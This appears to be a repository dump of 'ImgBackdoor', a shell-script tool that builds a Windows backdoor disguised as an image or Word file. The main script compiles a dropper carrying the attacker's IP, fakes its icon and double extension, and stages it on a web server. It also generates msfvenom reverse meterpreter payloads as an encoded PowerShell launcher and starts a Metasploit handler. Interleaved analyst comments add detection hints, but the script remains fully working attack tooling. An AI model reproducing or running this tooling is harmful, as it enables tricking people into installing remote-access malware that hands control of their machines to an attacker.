├── Cheese_Sat-07Dec19_17.19.png
├── ImgBackdoor.sh
├── LICENSE
├── README.md
├── banner
├── bin
├── FIE_logo.png
├── cleaner.rc
├── cleaner2.rc
├── evil.c
├── evil2.c
├── reshacker_setup.exe
└── word.docx
├── icons
├── JPEG-black.ico
├── JPEG-camera.ico
├── JPEG-orange.ico
├── JPEG-white.ico
├── JPG-Ios7.ico
├── JPG-black.ico
├── JPG-green.ico
├── JPG-white.ico
├── Microsoft-Excel.ico
├── Microsoft-Word.ico
├── PNG-black.ico
├── PNG-simple.ico
├── PNG-white.ico
├── Windows-Logo.ico
└── Windows-Store.ico
├── output
└── .set
├── pictures
├── Linux_Communism.png
├── about_communism.jpg
├── communist-windows.jpg
├── tux.jpeg
├── tux_communism.jpg
└── tuxguevara.png
└── settings
/Cheese_Sat-07Dec19_17.19.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tsuyoken/ImgBackdoor/9ba0c1b9840076610a259f4295978c52a8189664/Cheese_Sat-07Dec19_17.19.png
--------------------------------------------------------------------------------
/ImgBackdoor.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
# ImgBackdoor entry script.  Interactive flow: read ./settings, check build
# dependencies, compile bin/evil*.c into a Windows PE, swap its icon, rename
# it <name>.<picture-ext>.exe and stage picture, payload and .zip under the
# Apache webroot.  The annotations in this file are analyst notes (what each
# step does, which artifacts it leaves behind); no behavior is changed.
2 | resize -s 22 92 > /dev/null   # xterm resize(1): 22 rows x 92 columns; the shell snippet it prints is discarded
3 |
4 |
#######################################
# Defines the ANSI colour escapes used by the status messages below.
# Globals written: Escape, white, RedF, GreenF, YellowF, BlueF, CyanF, Reset
# Arguments: none   Outputs: none   Returns: 0
# Notes: 'white' and 'Reset' are both SGR 0 (attribute reset); CyanF is
# defined here but not referenced anywhere else in this file.  The escapes
# are later printed with plain `echo`, so they render only where sh's echo
# interprets "\033" (dash does; bash's builtin echo needs -e).
#######################################
5 | Colors() {
6 | Escape="\033";
7 | white="${Escape}[0m";
8 | RedF="${Escape}[31m";
9 | GreenF="${Escape}[32m";
10 | YellowF="${Escape}[33m";
11 | BlueF="${Escape}[34m";
12 | CyanF="${Escape}[36m";
13 | Reset="${Escape}[0m";
14 | }
15 |
# --- Identity and host discovery --------------------------------------------
16 | VeR="1.0"
17 | ken="kennedy69"
18 | ArCh=`arch`   # machine type (i386/i686/x86_64 ...); selects the wine binary, Wine "Program Files" folder and cross-compiler below
19 | IPATH=`pwd`   # the repo root is assumed to be the current directory: settings, bin/, icons/ and output/ are all resolved from it
20 | HoME=`echo ~`
21 | CnA="Metamorphosis"
22 | DiStR0=`awk '{print $1}' /etc/issue`   # first word of /etc/issue; drives the per-distro ifconfig parsing in the case further down
23 | InT3R=`netstat -r | grep "default" | awk {'print $8'}`   # interface of the default route (assumes netstat's routing-table column layout - confirm)
# Windows ProductName reported by the Wine prefix registry; it must read
# "Microsoft Windows 7" (checked later).  NOTE(review): the trailing redirect
# belongs to the assignment statement, not to the pipeline inside the
# backticks; whether it hides the pipeline's stderr is shell-dependent - confirm.
24 | HkLm=`cat $HoME/.wine/system.reg | egrep -m 1 'ProductName' | cut -d '=' -f2 | cut -d '"' -f2` > /dev/null 2>&1 # wine windows version
25 |
26 |
# --- Settings file.  Each key is read with an unanchored `egrep -m 1`, so the
# first line that merely contains the key name wins, and the value is
# everything after the first '='.  Same redirect caveat as above.
27 | bYR=`cat $IPATH/settings | egrep -m 1 "BYPASS_RH" | cut -d '=' -f2` > /dev/null 2>&1   # BYPASS_RH: YES = skip ResourceHacker, operator changes the icon by hand
28 | EtU=`cat $IPATH/settings | egrep -m 1 "PICTURE_EXTENSION" | cut -d '=' -f2` > /dev/null 2>&1   # PICTURE_EXTENSION: jpg/jpeg/png per README; also the middle part of the double extension
29 | PaLe=`cat $IPATH/settings | egrep -m 1 "PAYLOAD_EXTENSION" | cut -d '=' -f2` > /dev/null 2>&1   # PAYLOAD_EXTENSION: ps1/bat/txt/exe per README
30 | ApAc=`cat $IPATH/settings | egrep -m 1 "APACHE_WEBROOT" | cut -d '=' -f2` > /dev/null 2>&1   # APACHE_WEBROOT: directory where picture, payload and zip are staged
31 | NoMsF=`cat $IPATH/settings | egrep -m 1 "NON_MSF_PAYLOADS" | cut -d '=' -f2` > /dev/null 2>&1   # NON_MSF_PAYLOADS: YES = do not touch postgresql/msfconsole
32 | AuTo=`cat $IPATH/settings | egrep -m 1 "AUTO_PAYLOAD_BUILD" | cut -d '=' -f2` > /dev/null 2>&1   # AUTO_PAYLOAD_BUILD: YES = generate the payload with msfvenom
33 | AhPu=`cat $IPATH/settings | egrep -m 1 "AGENT_HANDLER_PORT" | cut -d '=' -f2` > /dev/null 2>&1   # AGENT_HANDLER_PORT: LPORT for msfvenom and multi/handler
34 | FwDc=`cat $IPATH/settings | egrep -m 1 "FAKE_WORD_DOC" | cut -d '=' -f2` > /dev/null 2>&1   # FAKE_WORD_DOC: YES = Word icon and <name>.docx.exe instead of a picture
35 | PuIa=`cat $IPATH/settings | egrep -m 1 "USE_PUBLIC_IP" | cut -d '=' -f2` > /dev/null 2>&1   # USE_PUBLIC_IP: YES = override the detected address with EXTERNAL_IP
36 | PuiB=`cat $IPATH/settings | egrep -m 1 "EXTERNAL_IP" | cut -d '=' -f2` > /dev/null 2>&1   # EXTERNAL_IP
37 | ChEk=`cat $IPATH/settings | egrep -m 1 "MSF_REBUILD" | cut -d '=' -f2` > /dev/null 2>&1   # MSF_REBUILD: ON = verify msfdb connectivity, reinit if needed
38 |
# --- Toolchain per architecture: wine binary, Wine "Program Files" folder and
# the mingw cross-compiler that builds the dropper.
39 | if [ "$ArCh" = "i386" ] || [ "$ArCh" = "i686" ]; then
40 | dEd="x86"
41 | arch="wine"
42 | PgFi="Program Files"
43 | ComP="i586-mingw32msvc-gcc"
44 | elif [ "$ArCh" = "x86_64" ] || [ "ArCh" = "amd64" ]; then   # the second test compares the literal string "ArCh" (no $), so in practice only x86_64 selects this branch
45 | dEd="x64"
46 | arch="wine64"
47 | PgFi="Program Files (x86)" # default value
48 | ComP="i686-w64-mingw32-gcc"
49 | else
50 | dEd="x86"
51 | arch="wine"
52 | PgFi="Program Files"
53 | ComP="i586-mingw32msvc-gcc"
54 | fi
55 | RhI="$HoME/.wine/drive_c/$PgFi/Resource Hacker/ResourceHacker.exe"   # expected location of ResourceHacker.exe inside the Wine prefix (used for the icon swap)
56 |
57 |
58 |
# --- Operator-side address discovery.  Whatever ends up in $IP is substituted
# into the dropper source (LhOsT placeholder further down) and printed as the
# delivery URL, so the staging host is recoverable in cleartext from a sample.
59 | case $DiStR0 in
60 | Kali) IP=`ifconfig $InT3R | egrep -w "inet" | awk '{print $2}'`;;   # Kali/Debian: "inet ADDR ..." layout
61 | Debian) IP=`ifconfig $InT3R | egrep -w "inet" | awk '{print $2}'`;;
62 | Mint) IP=`ifconfig $InT3R | egrep -w "inet" | awk '{print $2}' | cut -d ':' -f2`;;   # remaining distros: older "inet addr:ADDR Bcast:..." layout
63 | Ubuntu) IP=`ifconfig $InT3R | egrep -w "inet" | cut -d ':' -f2 | awk {'print $1'}`;;
64 | Parrot) IP=`ifconfig $InT3R | egrep -w "inet" | cut -d ':' -f2 | cut -d 'B' -f1`;;
65 | BackBox) IP=`ifconfig $InT3R | egrep -w "inet" | cut -d ':' -f2 | cut -d 'B' -f1`;;
66 | elementary) IP=`ifconfig $InT3R | egrep -w "inet" | cut -d ':' -f2 | cut -d 'B' -f1`;;
67 | *) IP=`zenity --title="Input your IP" --text "example: 192.168.0.1" --entry --width 300`;;   # unrecognised distro: prompt instead of parsing
68 | esac
69 | clear
70 |
71 | if [ "$PuIa" = "YES" ]; then   # USE_PUBLIC_IP=YES replaces the detected address with EXTERNAL_IP from settings
72 | IP="$PuiB"
73 | fi
74 |
75 | Colors;
76 | echo ${BlueF}[☆]${white} Checking backend applications ..${Reset};
77 | sleep 1
# --- Dependency checks.  Each probe is `which <tool>`; the `$?` tested on the
# following line is the status of that command substitution.  Missing tools
# are installed through sudo apt-get and FaIl="YES" forces an exit below so
# the operator re-runs the script.
78 | apc=`which $ComP`   # mingw cross-compiler selected above
79 | if [ "$?" != "0" ]; then
80 | FaIl="YES"
81 | echo ${RedF}[x]${white} mingw32[64] installation '->' not found!${Reset};
82 | sleep 1
83 | echo ${RedF}[x]${white} This script requires mingw32[64] to work${Reset};
84 | echo ${YellowF}[☆] Please wait: installing missing dependencies ..${Reset};
85 | if [ "$dEd" = "x86" ]; then
86 | echo ""
87 | sudo apt-get install mingw32
88 | echo ""
89 | else
90 | echo ""
91 | sudo dpkg --add-architecture i386 && apt-get update && apt-get -y dist-upgrade --allow-downgrades && apt-get install -y mingw32 i586-mingw32msvc-gcc mingw-w64 i686-w64-mingw32-gcc   # only dpkg is run through sudo; the chained apt-get calls run with the invoking user's privileges
92 | echo ""
93 | fi
94 | else
95 | echo ${BlueF}[✔️]${white}" mingw32 installation : ${GreenF}found!"${Reset};
96 | sleep 1
97 | fi
98 |
99 | apc=`which wine`   # wine: runs ResourceHacker.exe and its installer
100 | if [ "$?" != "0" ]; then
101 | FaIl="YES"
102 | echo ${RedF}[x]${white} Wine installation '->' not found!${Reset};
103 | sleep 1
104 | echo ${RedF}[x]${white} This script requires wine to work${Reset};
105 | echo ${YellowF}[☆] Please wait: installing missing dependencies ..${Reset};
106 | echo ""
107 | sudo apt-get install wine
108 | echo ""
109 | else
110 | echo ${BlueF}[✔️]${white}" Wine installation : ${GreenF}found!"${Reset};
111 | sleep 1
112 | fi
113 |
114 | apc=`which xterm`   # xterm: hosts the msfvenom, msfconsole and installer sessions
115 | if [ "$?" != "0" ]; then
116 | FaIl="YES"
117 | echo ${RedF}[x]${white} Xterm installation '->' not found!${Reset};
118 | sleep 1
119 | echo ${RedF}[x]${white} This script requires xterm to work!${Reset};
120 | echo ${YellowF}[☆] Please wait: installing missing dependencies ..${Reset};
121 | echo ""
122 | sudo apt-get install xterm
123 | echo ""
124 | else
125 | echo ${BlueF}[✔️]${white}" Xterm installation : ${GreenF}found!"${Reset};
126 | sleep 1
127 | fi
128 |
129 | apc=`which zenity`   # zenity: every interactive dialog in this script
130 | if [ "$?" != "0" ]; then
131 | FaIl="YES"
132 | echo ${RedF}[x]${white} Zenity installation '->' not found!${Reset};
133 | sleep 1
134 | echo ${RedF}[x]${white} This script requires Zenity to work!${Reset};
135 | echo ${YellowF}[☆] Please wait: installing missing dependencies ..${Reset};
136 | echo ""
137 | sudo apt-get install zenity
138 | echo ""
139 | else
140 | echo ${BlueF}[✔️]${white}" Zenity installation : ${GreenF}found!"${Reset};
141 | sleep 1
142 | fi
143 |
144 | if [ -e "$HoME/.wine/drive_c/$PgFi" ]; then   # the Wine prefix must already contain the Program Files folder; otherwise winecfg is launched to create the prefix
145 | echo ${BlueF}[☆]${white}" Wine $PgFi : ${GreenF}found!"${Reset};
146 | sleep 1
147 | else
148 | FaIl="YES"
149 | echo ${RedF}[x]${white} Wine: $PgFi '->' not found!${Reset};
150 | sleep 2
151 | echo ${GreenF}[☆]${white} Please wait, trying to build required folders ..!${Reset};
152 | winecfg > /dev/null 2>&1
153 | echo ""
154 | echo ${RedF}Listing drive_c directorys: ${Reset};
155 | ls $HoME/.wine/drive_c
156 | echo ""
157 | fi
158 |
159 |
160 | if [ "$FaIl" = "YES" ]; then   # any missing dependency: stop here, the operator must re-run the script
161 | sleep 3
162 | echo ${YellowF}[☆] ImgBackdoor needs to restart to finish installs ..${Reset};
163 | sleep 2
164 | exit
165 | fi
166 |
167 |
168 | if ! [ "$HkLm" = "Microsoft Windows 7" ]; then   # Wine must report Windows 7 (value read from system.reg above); winecfg is opened so the operator can change it, execution then continues regardless
169 | echo ${RedF}[x]${white} Wine system detected : ${RedF}$HkLm ${Reset};
170 | echo ${RedF}[x]${white} ImgBackdoor requires: ${GreenF}windows 7${white} version ..${Reset};
171 | echo ${YellowF}[☆] Starting winecfg, Please sellect required version ..${Reset};
172 | sleep 1
173 | winecfg > /dev/null 2>&1
174 | fi
175 |
176 |
177 | clear
178 | cat << !
179 |
180 | ▜▘ ▛▀▖ ▌ ▌
181 | ▐ ▛▚▀▖▞▀▌▙▄▘▝▀▖▞▀▖▌▗▘▞▀▌▞▀▖▞▀▖▙▀▖
182 | ▐ ▌▐ ▌▚▄▌▌ ▌▞▀▌▌ ▖▛▚ ▌ ▌▌ ▌▌ ▌▌
183 | ▀▘▘▝ ▘▗▄▘▀▀ ▝▀▘▝▀ ▘ ▘▝▀▘▝▀ ▝▀ ▘ $VeR
184 | Coded by: $ken
185 |
186 | Extension sellected: .$EtU (picture)
187 | Extension sellected: .$PaLe (payload)
188 | 'Edit setting file to select extention'
189 |
190 | !
# Yes/No dialog.  zenity --question reports the answer via its exit status,
# but that status is consumed by the `if` that follows, so the `$?` test
# further down does not see it (see the note there).
191 | rUn=$(zenity --question --title="Image Backdoor" --text "Execute framework?" --width 270) > /dev/null 2>&1
192 | if [ "$PaLe" = "exe" ] && [ "$AuTo" = "YES" ]; then   # AUTO_PAYLOAD_BUILD only emits a PowerShell stub, so it is rejected together with PAYLOAD_EXTENSION=exe
193 | echo ${RedF}[x]${YellowF} "[settings] AUTO_PAYLOAD_BUILD=${RedF}$AuTo${YellowF} and PAYLOAD_EXTENSION=${RedF}$PaLe"${Reset};
194 | sleep 2
195 | echo ${RedF}[x]${YellowF} "Can ${RedF}NOT${YellowF} be used simultaneously, AUTO_PAYLOAD_BUILD does not build .exe binarys."${Reset};
196 | exit
197 | fi
198 |
# NOTE(review): `$?` here is the exit status of the preceding if/fi (0 when
# its test was false), not the dialog's answer, so the else branch below is
# effectively unreachable as written.
199 | if [ "$?" -eq "0" ]; then
200 | service apache2 start | zenity --progress --pulsate --title "PLEASE WAIT" --text="Start apache2 webserver" --percentage=0 --auto-close --width 300 > /dev/null 2>&1   # staging web server; its output feeds a pulsating progress dialog
201 | if ! [ "$NoMsF" = "YES" ]; then   # NON_MSF_PAYLOADS not YES: also bring up postgresql for Metasploit
202 | service postgresql start | zenity --progress --pulsate --title "PLEASE WAIT" --text="Start Metasploit services" --percentage=0 --auto-close --width 300 > /dev/null 2>&1
203 | if [ "$ChEk" = "ON" ]; then   # MSF_REBUILD=ON: read db_status from msfconsole and reinit the database unless it reports "connected"
204 | service postgresql start
205 | echo ${BlueF}[☆]${white}" Checking msfdb connection status .."${Reset};
206 | ih=`msfconsole -q -x 'db_status; exit -y' | awk {'print $3'}`   # third field of the db_status line (assumes msfconsole's output wording - confirm)
207 | if [ "$ih" != "connected" ]; then
208 | echo ${RedF}[x]${white}" postgresql selected, no connection .."${Reset};
209 | echo ${BlueF}[☆]${white}" Please wait, rebuilding msf database .."${Reset};
210 | msfdb reinit | zenity --progress --pulsate --title "PLEASE WAIT" --text="Rebuild metasploit database" --percentage=0 --auto-close --width 300 > /dev/null 2>&1
211 | echo ${GreenF}[✔]${white}" postgresql connected to msf .."${Reset};
212 | sleep 2
213 | else
214 | echo ${GreenF}[✔]${white}" postgresql connected to msf .."${Reset};
215 | sleep 2
216 | fi
217 | fi
218 | fi
219 |
220 | else   # declined: print credits, stop the services and exit
221 |
222 | clear
223 | echo ""
224 | echo ${white} Codename${RedF}::${white}$CnA ${Reset};
225 | echo ${white} Maintener${RedF}::${white}$ken ${RedF}::${white}[Ferdi S Kennedy]${Reset};
226 | echo ""
227 | service apache2 stop | zenity --progress --pulsate --title "PLEASE WAIT" --text="Stop apache2 webserver" --percentage=0 --auto-close --width 300 > /dev/null 2>&1
228 | if ! [ "$NoMsF" = "YES" ]; then
229 | service postgresql stop | zenity --progress --pulsate --title "PLEASE WAIT" --text="Stop postgresql service" --percentage=0 --auto-close --width 300 > /dev/null 2>&1
230 | fi
231 | exit
232 | fi
233 |
234 |
# --- Payload stage.  AUTO_PAYLOAD_BUILD=YES: msfvenom (under sudo, inside an
# xterm) writes a psh-cmd payload to output/chars.raw; one field of that
# output is spliced into a fixed launcher line and saved as
# output/payload.<PAYLOAD_EXTENSION>.  Otherwise the operator picks an
# existing payload file, which is copied to the webroot later.
235 | if [ "$AuTo" = "YES" ]; then
236 | paylo=$(zenity --list --title "AUTO-BUILD PAYLOAD" --text "\nChose payload to build:" --radiolist --column "Pick" --column "Option" TRUE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" FALSE "windows/x64/meterpreter/reverse_tcp" FALSE "windows/x64/meterpreter/reverse_https" --width 350 --height 300) > /dev/null 2>&1
237 | xterm -T " ImgBackdoor - build payload: .$PaLe " -geometry 110x23 -e "sudo msfvenom -p $paylo LHOST=$IP LPORT=$AhPu -f psh-cmd -o $IPATH/output/chars.raw" > /dev/null 2>&1
238 | cd $IPATH/output
239 | str0=`cat chars.raw | awk {'print $12'}`   # 12th whitespace-separated field of the psh-cmd one-liner, expected to be the base64 encoded command (assumes msfvenom's output layout - confirm)
# Detection note: the launcher line below is constant across builds.  Its
# mixed case is cosmetic to PowerShell (switch names are case-insensitive and
# may be abbreviated; presumably -NoProfile -WindowStyle 1 -NonInteractive
# -EncodedCommand), so signatures should match case-insensitively on the
# switch sequence or on the generic "-eN <base64>" shape, not on this exact
# spelling.
240 | echo "pOwErShElL -noP -wIN 1 -nOnI -eN Sh33L" > payload.raw
241 | sed "s|Sh33L|$str0|" payload.raw > payload.$PaLe   # Sh33L placeholder -> encoded command; result is the staged payload file
242 | rm payload.raw > /dev/null 2>&1
243 | rm chars.raw > /dev/null 2>&1
244 | cd $IPATH
245 | else
246 | UpL=$(zenity --title "PAYLOAD TO BE TRANSFORMED (only .$PaLe)" --filename=$IPATH --file-selection --text "chose payload to be transformed") > /dev/null 2>&1   # manual mode: operator-supplied payload file
247 | fi
248 | sleep 1
249 | JpG=$(zenity --title "IMAGE TO BE USED (only .$EtU)" --filename=$IPATH --file-selection --text "chose image to use.") > /dev/null 2>&1   # decoy picture; staged on the webroot as <name>.<PICTURE_EXTENSION>
250 | sleep 1
251 |
# --- Icon for the dropper: FAKE_WORD_DOC=YES forces the Word icon, otherwise
# a short list matching PICTURE_EXTENSION (or an operator-supplied .ico) is
# offered from icons/.  $PaTh is handed to ResourceHacker further down.
252 | if [ "$FwDc" = "YES" ]; then
253 | PaTh="$IPATH/icons/Microsoft-Word.ico"
254 | else
255 | if [ "$EtU" = "jpg" ]; then
256 | IcOn=$(zenity --list --title "ICON REPLACEMENT" --text "Chose one icon from the list." --radiolist --column "Pick" --column "Option" TRUE "JPG-black.ico" FALSE "JPG-white.ico" FALSE "JPG-green.ico" FALSE "Input your own icon" --width 330 --height 240) > /dev/null 2>&1
257 | elif [ "$EtU" = "jpeg" ]; then
258 | IcOn=$(zenity --list --title "ICON REPLACEMENT " --text "Chose one icon from the list." --radiolist --column "Pick" --column "Option" TRUE "JPEG-black.ico" FALSE "JPEG-white.ico" FALSE "JPEG-orange.ico" FALSE "Input your own icon" --width 330 --height 240) > /dev/null 2>&1
259 | elif [ "$EtU" = "png" ]; then
260 | IcOn=$(zenity --list --title "ICON REPLACEMENT" --text "Chose one icon from the list." --radiolist --column "Pick" --column "Option" TRUE "PNG-black.ico" FALSE "PNG-white.ico" FALSE "PNG-simple.ico" FALSE "Input your own icon" --width 330 --height 240) > /dev/null 2>&1
261 | else
262 | IcOn=$(zenity --list --title "ICON REPLACEMENT" --text "Chose one icon from the list." --radiolist --column "Pick" --column "Option" TRUE "JPG-Ios7.ico" FALSE "Microsoft-Word.ico" FALSE "Microsoft-Excel.ico" FALSE "Input your own icon" --width 330 --height 240) > /dev/null 2>&1
263 | fi
264 | if [ "$IcOn" = "Input your own icon" ]; then
265 | ImR=$(zenity --title "ICON REPLACEMENT" --filename=$IPATH --file-selection --text "chose icon.ico to use") > /dev/null 2>&1
266 | PaTh="$ImR"
267 | else
268 | PaTh="$IPATH/icons/$IcOn"
269 | fi
270 | fi
271 | sleep 1
272 | MiP=$(zenity --title "PAYLOAD FINAL NAME" --text "example: screenshot" --entry --width 300) > /dev/null 2>&1   # base name shared by the dropper, the staged picture and the zip
273 | clear
274 | cat << !
275 |
276 | ▜▘ ▛▀▖ ▌ ▌
277 | ▐ ▛▚▀▖▞▀▌▙▄▘▝▀▖▞▀▖▌▗▘▞▀▌▞▀▖▞▀▖▙▀▖
278 | ▐ ▌▐ ▌▚▄▌▌ ▌▞▀▌▌ ▖▛▚ ▌ ▌▌ ▌▌ ▌▌
279 | ▀▘▘▝ ▘▗▄▘▀▀ ▝▀▘▝▀ ▘ ▘▝▀▘▝▀ ▝▀ ▘ $VeR
280 | Coded by: $ken
281 |
282 | !
# --- Build the dropper from bin/evil2.c (payload extension "exe") or
# bin/evil.c.  Placeholders: LhOsT -> $IP (staging host), ScRee ->
# "<name>.<picture-ext>" (the decoy picture's filename on the webroot),
# EhLh -> payload extension.  These are substituted as plain text, so the
# resulting PE likely carries the staging host and both filenames as
# readable strings - worth checking first when triaging a sample.
283 | cd $IPATH/bin
284 | echo ${BlueF}[☆]${white} Building : evil agent ..${Reset};
285 | if [ "$PaLe" = "exe" ]; then
286 | sed "s|LhOsT|$IP|g" evil2.c > evilcopy.c
287 | sed -i "s|ScRee|$MiP.$EtU|g" evilcopy.c
288 | sed -i "s|EhLh|$PaLe|g" evilcopy.c
289 | sleep 2
290 | else
291 | sed "s|LhOsT|$IP|g" evil.c > evilcopy.c
292 | sed -i "s|ScRee|$MiP.$EtU|g" evilcopy.c
293 | sed -i "s|EhLh|$PaLe|g" evilcopy.c
294 | sleep 2
295 | fi
296 |
297 | echo ${BlueF}[☆]${white} Compiling: agent using mingw32 ..${Reset};
298 | sleep 2
299 | $ComP evilcopy.c -o trigger.exe -lws2_32 -mwindows   # mingw cross-compile: Winsock linked, -mwindows = GUI subsystem (no console window).  Built per run from substituted source, so hashes are unlikely to repeat between builds
300 | mv trigger.exe $IPATH/output/trigger.exe > /dev/null 2>&1   # unbranded binary; replaced by agent.exe after the icon step
301 | cd $IPATH
302 |
# --- Icon swap.  BYPASS_RH=YES: the operator edits trigger.exe by hand;
# otherwise ResourceHacker (under wine) copies $PaTh into the
# ICONGROUP/MAINICON resource of trigger.exe and writes output/agent.exe.
# The lure is the picture/Word icon plus the double extension applied below;
# the PE itself is still a GUI-subsystem executable linked against ws2_32
# (see the compile step above), which is what stands out when triaging.
303 | if [ "$bYR" = "YES" ]; then
304 | echo ${YellowF}[☆]${white} Manually change icon.ico sellected ..${Reset};
305 | echo ${YellowF}[☆]${white} Use your favorite editor to change icon [trigger.exe]${Reset};
306 | echo ${YellowF}[☆] When finish, press any key to Continue ..${Reset};
307 | read op   # waits for a full line (Enter), not "any key"
308 | mv $IPATH/output/trigger.exe $IPATH/output/agent.exe > /dev/null 2>&1
309 |
310 | else
311 | if [ -f "$RhI" ]; then
312 | echo ${BlueF}[☆]${white} ResourceHacker.exe: found ..${Reset};
313 | sleep 1
314 | echo ${BlueF}[☆]${white} Working: In backdoor agent ..${Reset};
315 | $arch "$RhI" -open "$IPATH/output/trigger.exe" -save "$IPATH/output/agent.exe" -action addskip -res "$PaTh" -mask ICONGROUP,MAINICON,   # $arch is wine or wine64 (chosen from the machine type above)
316 | echo ${BlueF}[☆]${white} Change : backdoor agent icons ..${Reset};
317 | sleep 1
318 |
319 | else   # ResourceHacker missing: run bin/reshacker_setup.exe under wine, then exit so the operator re-runs the script
320 | echo ${RedF}[x]${white} ResourceHacker.exe '->' not found!${Reset};
321 | sleep 1
322 | cat << !
323 |
324 | Installing ResourceHacker under .wine directorys ..
325 | Version:$HkLm Arch:$ArCh Folder:$PgFi
326 | PATH:$RhI
327 |
328 | !
329 | sleep 3
330 | xterm -T "ImgBackdoor" -geometry 90x26 -e "$arch $IPATH/bin/reshacker_setup.exe && sleep 3"
331 | echo ${YellowF}[☆] Please wait, restarting tool ..${Reset};
332 | echo ${YellowF}[☆] For proper ResourceHacker.exe Instalation!${Reset};
333 | sleep 2
334 | exit
335 |
336 | fi
337 | fi
338 |
339 |
340 | echo ${BlueF}[☆]${white} Change : backdoor agent extension ..${Reset};
341 | mv $IPATH/output/agent.exe $IPATH/output/$MiP.$EtU.exe > /dev/null 2>&1   # double extension <name>.<picture-ext>.exe; per README it relies on Explorer's "Hide extensions for known file types" to display as <name>.<picture-ext>
342 | sleep 2
343 |
# --- Staging.  Files written to the Apache webroot ($ApAc = APACHE_WEBROOT):
#   payload.<PAYLOAD_EXTENSION>   built or operator-supplied payload
#   <name>.<PICTURE_EXTENSION>    decoy picture
#   <name>.zip                    the dropper (renamed <name>.docx.exe when FAKE_WORD_DOC=YES)
# The web server's access log therefore records the whole delivery sequence;
# per the README the dropper later fetches the picture and the payload from
# this same host.  The un-zipped dropper also stays in output/.
344 | echo ${BlueF}[☆]${white} Port: all files to apache2 webserver ..${Reset};
345 | if [ "$AuTo" = "YES" ]; then
346 | cp $IPATH/output/payload.$PaLe $ApAc/payload.$PaLe > /dev/null 2>&1
347 | else
348 | cp $UpL $ApAc/payload.$PaLe > /dev/null 2>&1
349 | fi
350 |
351 | cp $JpG $ApAc/$MiP.$EtU > /dev/null 2>&1
352 | sleep 2
353 | echo ${BlueF}[☆]${white} Creating: archive $MiP.zip ..${Reset};
354 | cd $IPATH/output
355 | if [ "$FwDc" = "YES" ]; then
356 | mv $MiP.$EtU.exe $MiP.docx.exe > /dev/null 2>&1
357 | zip $MiP.zip $MiP.docx.exe > /dev/null 2>&1
358 | mv $MiP.zip $ApAc/$MiP.zip > /dev/null 2>&1
359 | else
360 | zip $MiP.zip $MiP.$EtU.exe > /dev/null 2>&1
361 | mv $MiP.zip $ApAc/$MiP.zip > /dev/null 2>&1
362 | fi
363 | cd $IPATH
364 | sleep 2
365 |
# --- Final stage.  NON_MSF_PAYLOADS=YES: print the URL and the local agent
# path, then wait for Enter.  Otherwise build output/cleaner.rc from
# bin/cleaner*.rc (placeholders FaaF -> name, AssA -> picture extension,
# RffR -> payload extension; the template contents are not shown here) and
# run exploit/multi/handler in an xterm under sudo.  Both paths end by
# deleting the staged files from the webroot and stopping the services
# started earlier; intermediate files are also removed below.
366 | if [ "$NoMsF" = "YES" ]; then
367 | echo ${BlueF}[☆]${white} Metamorphosis: completed ..${Reset};
368 | sleep 2
369 | echo ${YellowF}[☆] Start your own handler now '(listener)' ..${Reset};
370 | sleep 2
371 | rm $IPATH/bin/evilcopy.c > /dev/null 2>&1
372 | rm $IPATH/output/trigger.exe > /dev/null 2>&1
373 | echo ""
374 | echo ${RedF}" ATTACK VECTOR: http://$IP/$MiP.zip"${Reset};   # delivery URL is plain http://, so the download is observable in cleartext
375 | echo ${RedF}" AGENT: $IPATH/output/$MiP.$EtU.exe"${Reset};
376 | echo ""
377 | sleep 1
378 | echo ${YellowF}[☆] When finish, press any key to Exit ImgBackdoor ..${Reset};
379 | read op   # waits for a full line (Enter); the webroot cleanup below runs afterwards
380 |
381 | else
382 |
383 | echo ${BlueF}[☆]${white} Creating: resource cleaner.rc ..${Reset};
384 | sleep 2
385 | cd $IPATH/bin
386 | if [ "$PaLe" = "exe" ]; then   # cleaner2.rc has the extra RffR placeholder for the .exe payload
387 | sed "s|RffR|$PaLe|g" cleaner2.rc > copy.rc
388 | sed -i "s|FaaF|$MiP|g" copy.rc
389 | sed -i "s|AssA|$EtU|g" copy.rc
390 | mv copy.rc $IPATH/output/cleaner.rc > /dev/null 2>&1
391 | cd $IPATH
392 | else
393 | sed "s|FaaF|$MiP|g" cleaner.rc > copy.rc
394 | sed -i "s|AssA|$EtU|g" copy.rc
395 | mv copy.rc $IPATH/output/cleaner.rc > /dev/null 2>&1
396 | cd $IPATH
397 | fi
398 | echo ${BlueF}[☆]${white} Metamorphosis: completed ..${Reset};
399 | rm $IPATH/output/trigger.exe > /dev/null 2>&1
400 | sleep 2
401 | if [ "$AuTo" = "YES" ]; then   # AUTO mode reuses the LHOST/LPORT/payload given to msfvenom; manual mode asks for them
402 | lhost="$IP"
403 | lport="$AhPu"
404 | else
405 | lhost=$(zenity --title="Enter binary.exe LHOST" --text "example: $IP" --entry --width 300) > /dev/null 2>&1
406 | lport=$(zenity --title="Enter binary.exe LPORT" --text "example: $AhPu" --entry --width 300) > /dev/null 2>&1
407 | paylo=$(zenity --list --title "ImgBackdoor" --text "\nChose payload used by binary.exe:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" FALSE "windows/x64/meterpreter/reverse_tcp" FALSE "windows/x64/meterpreter/reverse_https" --width 350 --height 350) > /dev/null 2>&1
408 | fi
409 | echo ""
410 | echo ${RedF}" ATTACK VECTOR: http://$IP/$MiP.zip"${Reset};
411 | if [ "$FwDc" = "YES" ]; then
412 | echo ${RedF}" AGENT: $IPATH/output/$MiP.docx.exe"${Reset};
413 | else
414 | echo ${RedF}" AGENT: $IPATH/output/$MiP.$EtU.exe"${Reset};
415 | fi
416 | echo ${RedF}" CLEAN: meterpreter > resource $IPATH/output/cleaner.rc"${Reset};
417 | sleep 1
418 | xterm -T " PAYLOAD MULTI-HANDLER " -geometry 110x23 -e "sudo msfconsole -x 'use exploit/multi/handler; set LHOST $lhost; set LPORT $lport; set PAYLOAD $paylo; exploit'"   # blocks until the handler's xterm is closed
419 | fi
# Webroot cleanup.  Note that <name>.<picture-ext>.exe was never copied to
# the webroot (only the zip was), so that rm is a no-op; the dropper and
# cleaner.rc remain in output/.
420 | rm $ApAc/$MiP.$EtU > /dev/null 2>&1
